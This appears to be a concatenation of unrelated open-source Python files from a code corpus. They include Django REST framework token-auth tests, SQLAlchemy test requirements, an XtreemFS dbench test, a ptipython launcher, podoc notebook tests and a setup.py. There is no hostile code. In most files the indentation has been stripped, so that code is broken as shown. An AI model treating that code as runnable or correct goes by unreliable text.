        self.password = 'password'
        self.user = User.objects.create_user(self.username, self.email, self.password)

        self.key = 'abcd1234'
        self.token = Token.objects.create(key=self.key, user=self.user)

    def test_post_form_passing_token_auth(self):
        """Ensure POSTing json over token auth with correct credentials passes and does not require CSRF"""
        auth = 'Token ' + self.key
        response = self.csrf_client.post('/token/', {'example': 'example'}, HTTP_AUTHORIZATION=auth)
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    def test_fail_post_form_passing_invalid_token_auth(self):
        # add an 'invalid' unicode character (non-latin-1-header-safe)
        auth = 'Token ' + self.key + "¸"
        response = self.csrf_client.post('/token/', {'example': 'example'}, HTTP_AUTHORIZATION=auth)
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)

    def test_post_json_passing_token_auth(self):
        """Ensure POSTing form over token auth with correct credentials passes and does not require CSRF"""
        auth = "Token " + self.key
        response = self.csrf_client.post('/token/', {'example': 'example'}, format='json', HTTP_AUTHORIZATION=auth)
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    def test_post_json_makes_one_db_query(self):
        """Ensure that authenticating a user using a token performs only one DB query"""
        auth = "Token " + self.key

        def func_to_test():
            return self.csrf_client.post('/token/', {'example': 'example'}, format='json', HTTP_AUTHORIZATION=auth)

        self.assertNumQueries(1, func_to_test)

    def test_post_form_failing_token_auth(self):
        """Ensure POSTing form over token auth without correct credentials fails"""
        response = self.csrf_client.post('/token/', {'example': 'example'})
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)

    def test_post_json_failing_token_auth(self):
        """Ensure POSTing json over token auth without correct credentials fails"""
        response = self.csrf_client.post('/token/', {'example': 'example'}, format='json')
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)

    def test_token_has_auto_assigned_key_if_none_provided(self):
        """Ensure creating a token with no key will auto-assign a key"""
        self.token.delete()
        token = Token.objects.create(user=self.user)
        self.assertTrue(bool(token.key))

    def test_generate_key_returns_string(self):
        """Ensure generate_key returns a string"""
        token = Token()
        key = token.generate_key()
        self.assertTrue(isinstance(key, six.string_types))

    def test_token_login_json(self):
        """Ensure token login view using JSON POST works."""
        client = APIClient(enforce_csrf_checks=True)
        response = client.post('/auth-token/',
                               {'username': self.username, 'password': self.password}, format='json')
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(response.data['token'], self.key)

    def test_token_login_json_bad_creds(self):
        """Ensure token login view using JSON POST fails if bad credentials are used."""
        client = APIClient(enforce_csrf_checks=True)
        response = client.post('/auth-token/',
                               {'username': self.username, 'password': "badpass"}, format='json')
        self.assertEqual(response.status_code, 400)

    def test_token_login_json_missing_fields(self):
        """Ensure token login view using JSON POST fails if missing fields."""
        client = APIClient(enforce_csrf_checks=True)
        response = client.post('/auth-token/',
                               {'username': self.username}, format='json')
        self.assertEqual(response.status_code, 400)

    def test_token_login_form(self):
        """Ensure token login view using form POST works."""
        client = APIClient(enforce_csrf_checks=True)
        response = client.post('/auth-token/',
                               {'username': self.username, 'password': self.password})
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(response.data['token'], self.key)
class IncorrectCredentialsTests(TestCase):
def test_incorrect_credentials(self):
"""
If a request contains bad authentication credentials, then
authentication should run and error, even if no permissions
are set on the view.
"""
class IncorrectCredentialsAuth(BaseAuthentication):
def authenticate(self, request):
raise exceptions.AuthenticationFailed('Bad credentials')
request = factory.get('/')
view = MockView.as_view(
authentication_classes=(IncorrectCredentialsAuth,),
permission_classes=()
)
response = view(request)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(response.data, {'detail': 'Bad credentials'})
class FailingAuthAccessedInRenderer(TestCase):
def setUp(self):
class AuthAccessingRenderer(renderers.BaseRenderer):
media_type = 'text/plain'
format = 'txt'
def render(self, data, media_type=None, renderer_context=None):
request = renderer_context['request']
if request.user.is_authenticated():
return b'authenticated'
return b'not authenticated'
class FailingAuth(BaseAuthentication):
def authenticate(self, request):
raise exceptions.AuthenticationFailed('authentication failed')
class ExampleView(APIView):
authentication_classes = (FailingAuth,)
renderer_classes = (AuthAccessingRenderer,)
def get(self, request):
return Response({'foo': 'bar'})
self.view = ExampleView.as_view()
def test_failing_auth_accessed_in_renderer(self):
"""
When authentication fails the renderer should still be able to access
`request.user` without raising an exception. Particularly relevant
to HTML responses that might reasonably access `request.user`.
"""
request = factory.get('/')
response = self.view(request)
content = response.render().content
self.assertEqual(content, b'not authenticated')
| bsd-2-clause |
odubno/microblog | flask/lib/python2.7/site-packages/sqlalchemy/testing/requirements.py | 23 | 18002 | # testing/requirements.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Global database feature support policy.
Provides decorators to mark tests requiring specific feature support from the
target database.
External dialect test suites should subclass SuiteRequirements
to provide specific inclusion/exclusions.
"""
from . import exclusions
class Requirements(object):
pass
class SuiteRequirements(Requirements):
@property
def create_table(self):
"""target platform can emit basic CreateTable DDL."""
return exclusions.open()
@property
def drop_table(self):
"""target platform can emit basic DropTable DDL."""
return exclusions.open()
@property
def foreign_keys(self):
"""Target database must support foreign keys."""
return exclusions.open()
@property
def on_update_cascade(self):
""""target database must support ON UPDATE..CASCADE behavior in
foreign keys."""
return exclusions.open()
@property
def non_updating_cascade(self):
"""target database must *not* support ON UPDATE..CASCADE behavior in
foreign keys."""
return exclusions.closed()
@property
def deferrable_fks(self):
return exclusions.closed()
@property
def on_update_or_deferrable_fks(self):
# TODO: exclusions should be composable,
# somehow only_if([x, y]) isn't working here, negation/conjunctions
# getting confused.
return exclusions.only_if(
lambda: self.on_update_cascade.enabled or
self.deferrable_fks.enabled
)
@property
def self_referential_foreign_keys(self):
"""Target database must support self-referential foreign keys."""
return exclusions.open()
@property
def foreign_key_ddl(self):
"""Target database must support the DDL phrases for FOREIGN KEY."""
return exclusions.open()
@property
def named_constraints(self):
"""target database must support names for constraints."""
return exclusions.open()
@property
def subqueries(self):
"""Target database must support subqueries."""
return exclusions.open()
@property
def offset(self):
"""target database can render OFFSET, or an equivalent, in a
SELECT.
"""
return exclusions.open()
@property
def boolean_col_expressions(self):
"""Target database must support boolean expressions as columns"""
return exclusions.closed()
@property
def nullsordering(self):
"""Target backends that support nulls ordering."""
return exclusions.closed()
@property
def standalone_binds(self):
"""target database/driver supports bound parameters as column expressions
without being in the context of a typed column.
"""
return exclusions.closed()
@property
def intersect(self):
"""Target database must support INTERSECT or equivalent."""
return exclusions.closed()
@property
def except_(self):
"""Target database must support EXCEPT or equivalent (i.e. MINUS)."""
return exclusions.closed()
@property
def window_functions(self):
"""Target database must support window functions."""
return exclusions.closed()
@property
def autoincrement_insert(self):
"""target platform generates new surrogate integer primary key values
when insert() is executed, excluding the pk column."""
return exclusions.open()
@property
def fetch_rows_post_commit(self):
"""target platform will allow cursor.fetchone() to proceed after a
COMMIT.
Typically this refers to an INSERT statement with RETURNING which
is invoked within "autocommit". If the row can be returned
after the autocommit, then this rule can be open.
"""
return exclusions.open()
@property
def empty_inserts(self):
"""target platform supports INSERT with no values, i.e.
INSERT DEFAULT VALUES or equivalent."""
return exclusions.only_if(
lambda config: config.db.dialect.supports_empty_insert or
config.db.dialect.supports_default_values,
"empty inserts not supported"
)
@property
def insert_from_select(self):
"""target platform supports INSERT from a SELECT."""
return exclusions.open()
@property
def returning(self):
"""target platform supports RETURNING."""
return exclusions.only_if(
lambda config: config.db.dialect.implicit_returning,
"%(database)s %(does_support)s 'returning'"
)
@property
def duplicate_names_in_cursor_description(self):
"""target platform supports a SELECT statement that has
the same name repeated more than once in the columns list."""
return exclusions.open()
@property
def denormalized_names(self):
"""Target database must have 'denormalized', i.e.
UPPERCASE as case insensitive names."""
return exclusions.skip_if(
lambda config: not config.db.dialect.requires_name_normalize,
"Backend does not require denormalized names."
)
@property
def multivalues_inserts(self):
"""target database must support multiple VALUES clauses in an
INSERT statement."""
return exclusions.skip_if(
lambda config: not config.db.dialect.supports_multivalues_insert,
"Backend does not support multirow inserts."
)
@property
def implements_get_lastrowid(self):
""""target dialect implements the executioncontext.get_lastrowid()
method without reliance on RETURNING.
"""
return exclusions.open()
@property
def emulated_lastrowid(self):
""""target dialect retrieves cursor.lastrowid, or fetches
from a database-side function after an insert() construct executes,
within the get_lastrowid() method.
Only dialects that "pre-execute", or need RETURNING to get last
inserted id, would return closed/fail/skip for this.
"""
return exclusions.closed()
@property
def dbapi_lastrowid(self):
""""target platform includes a 'lastrowid' accessor on the DBAPI
cursor object.
"""
return exclusions.closed()
@property
def views(self):
"""Target database must support VIEWs."""
return exclusions.closed()
@property
def schemas(self):
"""Target database must support external schemas, and have one
named 'test_schema'."""
return exclusions.closed()
@property
def sequences(self):
"""Target database must support SEQUENCEs."""
return exclusions.only_if([
lambda config: config.db.dialect.supports_sequences
], "no sequence support")
@property
def sequences_optional(self):
"""Target database supports sequences, but also optionally
as a means of generating new PK values."""
return exclusions.only_if([
lambda config: config.db.dialect.supports_sequences and
config.db.dialect.sequences_optional
], "no sequence support, or sequences not optional")
@property
def reflects_pk_names(self):
return exclusions.closed()
@property
def table_reflection(self):
return exclusions.open()
@property
def view_column_reflection(self):
"""target database must support retrieval of the columns in a view,
similarly to how a table is inspected.
This does not include the full CREATE VIEW definition.
"""
return self.views
@property
def view_reflection(self):
"""target database must support inspection of the full CREATE VIEW definition.
"""
return self.views
@property
def schema_reflection(self):
return self.schemas
@property
def primary_key_constraint_reflection(self):
return exclusions.open()
@property
def foreign_key_constraint_reflection(self):
return exclusions.open()
@property
def index_reflection(self):
return exclusions.open()
@property
def unique_constraint_reflection(self):
"""target dialect supports reflection of unique constraints"""
return exclusions.open()
@property
def unbounded_varchar(self):
"""Target database must support VARCHAR with no length"""
return exclusions.open()
@property
def unicode_data(self):
"""Target database/dialect must support Python unicode objects with
non-ASCII characters represented, delivered as bound parameters
as well as in result rows.
"""
return exclusions.open()
@property
def unicode_ddl(self):
"""Target driver must support some degree of non-ascii symbol
names.
"""
return exclusions.closed()
@property
def datetime_literals(self):
"""target dialect supports rendering of a date, time, or datetime as a
literal string, e.g. via the TypeEngine.literal_processor() method.
"""
return exclusions.closed()
@property
def datetime(self):
"""target dialect supports representation of Python
datetime.datetime() objects."""
return exclusions.open()
@property
def datetime_microseconds(self):
"""target dialect supports representation of Python
datetime.datetime() with microsecond objects."""
return exclusions.open()
@property
def datetime_historic(self):
"""target dialect supports representation of Python
datetime.datetime() objects with historic (pre 1970) values."""
return exclusions.closed()
@property
def date(self):
"""target dialect supports representation of Python
datetime.date() objects."""
return exclusions.open()
@property
def date_coerces_from_datetime(self):
"""target dialect accepts a datetime object as the target
of a date column."""
return exclusions.open()
@property
def date_historic(self):
"""target dialect supports representation of Python
datetime.datetime() objects with historic (pre 1970) values."""
return exclusions.closed()
@property
def time(self):
"""target dialect supports representation of Python
datetime.time() objects."""
return exclusions.open()
@property
def time_microseconds(self):
"""target dialect supports representation of Python
datetime.time() with microsecond objects."""
return exclusions.open()
@property
def binary_comparisons(self):
"""target database/driver can allow BLOB/BINARY fields to be compared
against a bound parameter value.
"""
return exclusions.open()
@property
def binary_literals(self):
"""target backend supports simple binary literals, e.g. an
expression like::
SELECT CAST('foo' AS BINARY)
Where ``BINARY`` is the type emitted from :class:`.LargeBinary`,
e.g. it could be ``BLOB`` or similar.
Basically fails on Oracle.
"""
return exclusions.open()
@property
def precision_numerics_general(self):
"""target backend has general support for moderately high-precision
numerics."""
return exclusions.open()
@property
def precision_numerics_enotation_small(self):
"""target backend supports Decimal() objects using E notation
to represent very small values."""
return exclusions.closed()
@property
def precision_numerics_enotation_large(self):
"""target backend supports Decimal() objects using E notation
to represent very large values."""
return exclusions.closed()
@property
def precision_numerics_many_significant_digits(self):
"""target backend supports values with many digits on both sides,
such as 319438950232418390.273596, 87673.594069654243
"""
return exclusions.closed()
@property
def precision_numerics_retains_significant_digits(self):
"""A precision numeric type will return empty significant digits,
i.e. a value such as 10.000 will come back in Decimal form with
the .000 maintained."""
return exclusions.closed()
@property
def precision_generic_float_type(self):
"""target backend will return native floating point numbers with at
least seven decimal places when using the generic Float type.
"""
return exclusions.open()
@property
def floats_to_four_decimals(self):
"""target backend can return a floating-point number with four
significant digits (such as 15.7563) accurately
(i.e. without FP inaccuracies, such as 15.75629997253418).
"""
return exclusions.open()
@property
def fetch_null_from_numeric(self):
"""target backend doesn't crash when you try to select a NUMERIC
value that has a value of NULL.
Added to support Pyodbc bug #351.
"""
return exclusions.open()
@property
def text_type(self):
"""Target database must support an unbounded Text() "
"type such as TEXT or CLOB"""
return exclusions.open()
@property
def empty_strings_varchar(self):
"""target database can persist/return an empty string with a
varchar.
"""
return exclusions.open()
@property
def empty_strings_text(self):
"""target database can persist/return an empty string with an
unbounded text."""
return exclusions.open()
@property
def selectone(self):
"""target driver must support the literal statement 'select 1'"""
return exclusions.open()
@property
def savepoints(self):
"""Target database must support savepoints."""
return exclusions.closed()
@property
def two_phase_transactions(self):
"""Target database must support two-phase transactions."""
return exclusions.closed()
@property
def update_from(self):
"""Target must support UPDATE..FROM syntax"""
return exclusions.closed()
@property
def update_where_target_in_subquery(self):
"""Target must support UPDATE where the same table is present in a
subquery in the WHERE clause.
This is an ANSI-standard syntax that apparently MySQL can't handle,
such as:
UPDATE documents SET flag=1 WHERE documents.title IN
(SELECT max(documents.title) AS title
FROM documents GROUP BY documents.user_id
)
"""
return exclusions.open()
@property
def mod_operator_as_percent_sign(self):
"""target database must use a plain percent '%' as the 'modulus'
operator."""
return exclusions.closed()
@property
def percent_schema_names(self):
"""target backend supports weird identifiers with percent signs
in them, e.g. 'some % column'.
this is a very weird use case but often has problems because of
DBAPIs that use python formatting. It's not a critical use
case either.
"""
return exclusions.closed()
@property
def order_by_label_with_expression(self):
"""target backend supports ORDER BY a column label within an
expression.
Basically this::
select data as foo from test order by foo || 'bar'
Lots of databases including Postgresql don't support this,
so this is off by default.
"""
return exclusions.closed()
@property
def unicode_connections(self):
"""Target driver must support non-ASCII characters being passed at
all.
"""
return exclusions.open()
@property
def graceful_disconnects(self):
"""Target driver must raise a DBAPI-level exception, such as
InterfaceError, when the underlying connection has been closed
and the execute() method is called.
"""
return exclusions.open()
@property
def skip_mysql_on_windows(self):
"""Catchall for a large variety of MySQL on Windows failures"""
return exclusions.open()
@property
def ad_hoc_engines(self):
"""Test environment must allow ad-hoc engine/connection creation.
DBs that scale poorly for many connections, even when closed, i.e.
Oracle, may use the "--low-connections" option which flags this
requirement as not present.
"""
return exclusions.skip_if(
lambda config: config.options.low_connections)
def _has_mysql_on_windows(self, config):
return False
def _has_mysql_fully_case_sensitive(self, config):
return False
@property
def sqlite(self):
return exclusions.skip_if(lambda: not self._has_sqlite())
@property
def cextensions(self):
return exclusions.skip_if(
lambda: not self._has_cextensions(), "C extensions not installed"
)
def _has_sqlite(self):
from sqlalchemy import create_engine
try:
create_engine('sqlite://')
return True
except ImportError:
return False
def _has_cextensions(self):
try:
from sqlalchemy import cresultproxy, cprocessors
return True
except ImportError:
return False
| bsd-3-clause |
jswrenn/xtreemfs | tests/test_scripts/13_dbench.py | 6 | 2120 | #! /usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2009-2011 by Bjoern Kolbeck, Minor Gordon, Zuse Institute Berlin
# Licensed under the BSD License, see LICENSE file for details.
import unittest, os.path, sys, subprocess, gzip
from datetime import datetime
# Constants
MY_DIR_PATH = os.path.dirname( os.path.abspath( sys.modules[__name__].__file__ ) )
DBENCH_CLIENT_TXT_GZ_FILE_PATH = os.path.join( MY_DIR_PATH, "dbench-client.txt.gz" )
class dbenchTest(unittest.TestCase):
def __init__( self, direct_io=True, stdout=sys.stdout, stderr=sys.stderr, *args, **kwds ):
unittest.TestCase.__init__( self )
self.direct_io = direct_io
self.stdout = stdout
self.stderr = stderr
def runTest( self ):
if self.direct_io:
gzip_client_txt_gz_data = gzip.GzipFile( DBENCH_CLIENT_TXT_GZ_FILE_PATH, mode="rb" ).read()
assert len( gzip_client_txt_gz_data ) > 0
open( "dbench-client.txt", "wb" ).write( gzip_client_txt_gz_data )
assert os.stat( "dbench-client.txt" ).st_size > 0
args = "dbench -c dbench-client.txt -D . 5"
isodatetime = datetime.today().isoformat()[:-7].replace( '-', '' ).replace( ':', '' )
stdout = open(sys.argv[4] + "/log/dbench-stdout-"+isodatetime+".txt", "a+" )
p = subprocess.Popen( args, shell=True, stdout=stdout, stderr=subprocess.STDOUT )
retcode = p.wait()
self.assertEqual( retcode, 0 )
else:
print >>self.stdout, self.__class__.__name__ + ": skipping nondirect volume", os.getcwd()
def createTestSuite( *args, **kwds ):
if not sys.platform.startswith( "win" ):
return unittest.TestSuite( [dbenchTest( *args, **kwds )] )
if __name__ == "__main__":
if not sys.platform.startswith( "win" ):
result = unittest.TextTestRunner( verbosity=2 ).run( createTestSuite() )
if not result.wasSuccessful():
sys.exit(1)
else:
print sys.modules[__name__].__file__.split( os.sep )[-1], "not supported on Windows"
| bsd-3-clause |
richm/designate | designate/tests/test_backend/__init__.py | 2 | 1043 | # Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Author: Kiall Mac Innes <kiall@hp.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
from designate import backend
class BackendTestMixin(object):
def get_backend_driver(self):
central_service = self.start_service('central')
return backend.get_backend(cfg.CONF['service:agent'].backend_driver,
central_service=central_service)
def test_constructor(self):
self.get_backend_driver()
| apache-2.0 |
BRAINSia/ITK | Utilities/Maintenance/ParallelStripIncludes.py | 7 | 1662 | #!/usr/bin/python
# ==========================================================================
#
# Copyright NumFOCUS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ==========================================================================*/
# Author: Pat Marion
# Modified by Xiaoxiao Liu.
## This script is designed to run StriIncludes.py in parallel to significantly reduce
## the processing time for removing unnecessary header includes.
## To run the script you need to edit StripIncludes.py.
## You should also set up the number of processes according to the machine configuration.
from StripIncludes import *
from multiprocessing import Pool
############### Inputs: need edit #############
FILES_PER_PROCESS = 2
NUMBER_OF_PROCESSES = 8
#################################################
def main():
fileList = open(relativeFileList, "r").read().splitlines()
args = []
for i in xrange(0, len(fileList), FILES_PER_PROCESS):
args.append(fileList[i : i + FILES_PER_PROCESS])
pool = Pool(processes=NUMBER_OF_PROCESSES)
pool.map(processFileList, args)
if __name__ == "__main__":
main()
| apache-2.0 |
eddiemonroe/opencog | opencog/python/pln_old/examples/context/context_agent.py | 32 | 1282 | """
A MindAgent to test the application of the context rules
"""
from opencog.cogserver import MindAgent
from pln.chainers import Chainer
from pln.rules import *
__author__ = 'Sebastian Ruder'
class ContextAgent(MindAgent):
def __init__(self):
self.chainer = None
def create_chainer(self, atomspace):
self.chainer = Chainer(atomspace,
stimulateAtoms=False,
preferAttentionalFocus=False,
allow_output_with_variables=True,
delete_temporary_variables=True)
self.chainer.add_rule(InheritanceToContextRule(self.chainer))
self.chainer.add_rule(EvaluationToContextRule(self.chainer))
self.chainer.add_rule(SubsetToContextRule(self.chainer))
self.chainer.add_rule(ContextToInheritanceRule(self.chainer))
self.chainer.add_rule(ContextToEvaluationRule(self.chainer))
self.chainer.add_rule(ContextToSubsetRule(self.chainer))
self.chainer.add_rule(ContextFreeToSensitiveRule(self.chainer))
def run(self, atomspace):
if self.chainer is None:
self.create_chainer(atomspace)
return
result = self.chainer.forward_step()
return result
| agpl-3.0 |
TNT-Samuel/Coding-Projects | DNS Server/Source - Copy/Lib/site-packages/ptpython/entry_points/run_ptipython.py | 3 | 3109 | #!/usr/bin/env python
"""
ptipython: IPython interactive shell with the `prompt_toolkit` front-end.
Usage:
ptpython [ --vi ]
[ --config-dir=<directory> ] [ --interactive=<filename> ]
[--] [ <arg>... ]
ptpython -h | --help
Options:
--vi : Use Vi keybindings instead of Emacs bindings.
--config-dir=<directory> : Pass config directory. By default '~/.ptpython/'.
-i, --interactive=<filename> : Start interactive shell after executing this file.
"""
from __future__ import absolute_import, unicode_literals
import docopt
import os
import six
import sys
def run(user_ns=None):
a = docopt.docopt(__doc__)
vi_mode = bool(a['--vi'])
config_dir = os.path.expanduser(a['--config-dir'] or os.path.join('~', '.ptpython'))
# Create config directory.
if not os.path.isdir(config_dir) and not os.path.islink(config_dir):
os.mkdir(config_dir)
# If IPython is not available, show message and exit here with error status
# code.
try:
import IPython
except ImportError:
print('IPython not found. Please install IPython (pip install ipython).')
sys.exit(1)
else:
from ptpython.ipython import embed
from ptpython.repl import run_config, enable_deprecation_warnings
# Add the current directory to `sys.path`.
if sys.path[0] != '':
sys.path.insert(0, '')
# When a file has been given, run that, otherwise start the shell.
if a['<arg>'] and not a['--interactive']:
sys.argv = a['<arg>']
six.exec_(compile(open(a['<arg>'][0], "rb").read(), a['<arg>'][0], 'exec'))
else:
enable_deprecation_warnings()
# Create an empty namespace for this interactive shell. (If we don't do
# that, all the variables from this function will become available in
# the IPython shell.)
if user_ns is None:
user_ns = {}
# Startup path
startup_paths = []
if 'PYTHONSTARTUP' in os.environ:
startup_paths.append(os.environ['PYTHONSTARTUP'])
# --interactive
if a['--interactive']:
startup_paths.append(a['--interactive'])
sys.argv = [a['--interactive']] + a['<arg>']
# exec scripts from startup paths
for path in startup_paths:
if os.path.exists(path):
with open(path, 'r') as f:
code = compile(f.read(), path, 'exec')
six.exec_(code, user_ns, user_ns)
else:
print('File not found: {}\n\n'.format(path))
sys.exit(1)
# Apply config file
def configure(repl):
path = os.path.join(config_dir, 'config.py')
if os.path.exists(path):
run_config(repl, path)
# Run interactive shell.
embed(vi_mode=vi_mode,
history_filename=os.path.join(config_dir, 'history'),
configure=configure,
user_ns=user_ns,
title='IPython REPL (ptipython)')
if __name__ == '__main__':
run()
| gpl-3.0 |
rossant/podoc | podoc/notebook/tests/test_manager.py | 2 | 8336 | # -*- coding: utf-8 -*-
"""Tests for the Notebook contents manager.
Taken from https://github.com/jupyter/notebook/blob/master/notebook/services/contents/tests/test_manager.py # noqa
"""
#-------------------------------------------------------------------------------------------------
# Imports
#-------------------------------------------------------------------------------------------------
from itertools import combinations
from tempfile import TemporaryDirectory
from tornado.web import HTTPError
import notebook.services.contents.tests.test_manager as tm
from ..manager import PodocContentsManager
# Monkey patch Jupyter's FileContentsManager with podoc's class.
tm.FileContentsManager = PodocContentsManager
#-------------------------------------------------------------------------------------------------
# Tests
#-------------------------------------------------------------------------------------------------
class TestPodocFileContentsManager(tm.TestFileContentsManager):
pass
class TestPodocContentsManager(tm.TestContentsManager):
def make_populated_dir(self, api_path):
cm = self.contents_manager
self.make_dir(api_path)
cm.new(path="/".join([api_path, "nb.ipynb"]))
cm.new(path="/".join([api_path, "file.txt"]))
# Ideally this one should *not* be interpreted as an AST...
cm.new(path="/".join([api_path, "file.json"]))
# Add a Markdown file. It should be detected as a notebook.
cm.new(path="/".join([api_path, "markdown.md"]))
def check_populated_dir_files(self, api_path):
dir_model = self.contents_manager.get(api_path)
self.assertEqual(dir_model['path'], api_path)
self.assertEqual(dir_model['type'], "directory")
for entry in dir_model['content']:
if entry['type'] == "directory":
continue
elif entry['type'] == "file":
assert entry['name'] in ('file.txt', 'file.json')
complete_path = "/".join([api_path, entry['name']])
self.assertEqual(entry["path"], complete_path)
elif entry['type'] == "notebook":
# The notebook is either the .ipynb or .md file.
assert entry['name'] in ('nb.ipynb', 'markdown.md')
complete_path = "/".join([api_path, entry['name']])
self.assertEqual(entry["path"], complete_path)
def setUp(self):
self._temp_dir = TemporaryDirectory()
self.td = self._temp_dir.name
self.contents_manager = PodocContentsManager(
root_dir=self.td,
)
def test_get(self):
super(TestPodocContentsManager, self).test_get()
cm = self.contents_manager
# Test in sub-directory
sub_dir = '/foo/'
self.make_dir('foo')
# Use the .md extension.
model = cm.new_untitled(path=sub_dir, ext='.md')
model2 = cm.get(sub_dir + model['name'])
assert isinstance(model2, dict)
self.assertIn('name', model2)
self.assertIn('path', model2)
self.assertIn('content', model2)
self.assertEqual(model2['name'], 'Untitled.md')
self.assertEqual(model2['path'], '{0}/{1}'.format(sub_dir.strip('/'), model['name']))
def test_update_md(self):
cm = self.contents_manager
# Create a notebook
model = cm.new_untitled(type='notebook')
path = model['path']
# Change the name in the model for rename
model['path'] = 'test.md'
model = cm.update(model, path)
assert isinstance(model, dict)
self.assertIn('name', model)
self.assertIn('path', model)
self.assertEqual(model['name'], 'test.md')
# Make sure the old name is gone
self.assertRaises(HTTPError, cm.get, path)
# Test in sub-directory
# Create a directory and notebook in that directory
sub_dir = '/foo/'
self.make_dir('foo')
model = cm.new_untitled(path=sub_dir, type='notebook')
path = model['path']
# Change the name in the model for rename
d = path.rsplit('/', 1)[0]
new_path = model['path'] = d + '/test_in_sub.md'
model = cm.update(model, path)
assert isinstance(model, dict)
self.assertIn('name', model)
self.assertIn('path', model)
self.assertEqual(model['name'], 'test_in_sub.md')
self.assertEqual(model['path'], new_path)
# Make sure the old name is gone
self.assertRaises(HTTPError, cm.get, path)
def test_save_md(self):
cm = self.contents_manager
# Create a notebook
model = cm.new_untitled(type='notebook', ext='.md')
name = model['name']
path = model['path']
# Get the model with 'content'
full_model = cm.get(path)
# Save the notebook
model = cm.save(full_model, path)
assert isinstance(model, dict)
self.assertIn('name', model)
self.assertIn('path', model)
self.assertEqual(model['name'], name)
self.assertEqual(model['path'], path)
# Test in sub-directory
# Create a directory and notebook in that directory
sub_dir = '/foo/'
self.make_dir('foo')
model = cm.new_untitled(path=sub_dir, type='notebook', ext='.md')
name = model['name']
path = model['path']
model = cm.get(path)
# Change the name in the model for rename
model = cm.save(model, path)
assert isinstance(model, dict)
self.assertIn('name', model)
self.assertIn('path', model)
self.assertEqual(model['name'], 'Untitled.md')
self.assertEqual(model['path'], 'foo/Untitled.md')
def test_rename_md(self):
cm = self.contents_manager
# Create a new notebook
nb, name, path = self.new_notebook()
# Rename the notebook
cm.rename(path, "changed_path")
# Attempting to get the notebook under the old name raises an error
self.assertRaises(HTTPError, cm.get, path)
# Fetching the notebook under the new name is successful
assert isinstance(cm.get("changed_path"), dict)
# Ported tests on nested directory renaming from pgcontents
all_dirs = ['foo', 'bar', 'foo/bar', 'foo/bar/foo', 'foo/bar/foo/bar']
unchanged_dirs = all_dirs[:2]
changed_dirs = all_dirs[2:]
for _dir in all_dirs:
self.make_populated_dir(_dir)
self.check_populated_dir_files(_dir)
# Renaming to an existing directory should fail
for src, dest in combinations(all_dirs, 2):
with self.assertRaisesHTTPError(409):
cm.rename(src, dest)
# Creating a notebook in a non_existant directory should fail
with self.assertRaisesHTTPError(404):
cm.new_untitled("foo/bar_diff", ext=".md")
cm.rename("foo/bar", "foo/bar_diff")
# Assert that unchanged directories remain so
for unchanged in unchanged_dirs:
self.check_populated_dir_files(unchanged)
# Assert changed directories can no longer be accessed under old names
for changed_dirname in changed_dirs:
with self.assertRaisesHTTPError(404):
cm.get(changed_dirname)
new_dirname = changed_dirname.replace("foo/bar", "foo/bar_diff", 1)
self.check_populated_dir_files(new_dirname)
# Created a notebook in the renamed directory should work
cm.new_untitled("foo/bar_diff", ext=".md")
    def test_copy_md(self):
        """Copying files generates -CopyN names and honours explicit targets.

        Uses non-ASCII path components to exercise unicode path handling.
        """
        cm = self.contents_manager
        parent = u'å b'
        name = u'nb √.md'
        path = u'{0}/{1}'.format(parent, name)
        self.make_dir(parent)
        orig = cm.new(path=path)
        # copy with unspecified name
        copy = cm.copy(path)
        self.assertEqual(copy['name'], orig['name'].replace(
            '.md', '-Copy1.md'))
        # copy with specified name
        copy2 = cm.copy(path, u'å b/copy 2.md')
        self.assertEqual(copy2['name'], u'copy 2.md')
        self.assertEqual(copy2['path'], u'å b/copy 2.md')
        # copy with specified path (directory): keeps the original file name
        copy2 = cm.copy(path, u'/')
        self.assertEqual(copy2['name'], name)
        self.assertEqual(copy2['path'], name)
| bsd-3-clause |
ocefpaf/paegan-transport | setup.py | 2 | 1228 | from __future__ import with_statement
from setuptools import setup, find_packages
from paegan.transport import __version__
def readme():
    """Return the contents of README.md for use as the long description."""
    with open('README.md') as f:
        return f.read()

# Read the pinned requirements once at import time.  BUG FIX: the original
# used a bare ``open()`` inside the comprehension, leaking the file handle
# until garbage collection; a ``with`` block closes it deterministically.
with open('requirements.txt') as req_file:
    reqs = [line.strip() for line in req_file]

setup(
    namespace_packages = ['paegan'],
    name = "paegan-transport",
    version = __version__,
    description = "Particle transport packages for the Paegan library",
    long_description = readme(),
    license = 'GPLv3',
    author = "Kyle Wilcox",
    author_email = "kyle@axiomdatascience.com",
    url = "https://github.com/axiom-data-science/paegan-transport",
    packages = find_packages(),
    install_requires = reqs,
    classifiers = [
        'Development Status :: 3 - Alpha',
        'Intended Audience :: Developers',
        'Intended Audience :: Science/Research',
        'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
        'Operating System :: POSIX :: Linux',
        'Programming Language :: Python',
        'Topic :: Scientific/Engineering',
    ],
    include_package_data = True,
)
| gpl-3.0 |
rh0dium/django-profiles | profiles/utils.py | 21 | 1467 | """
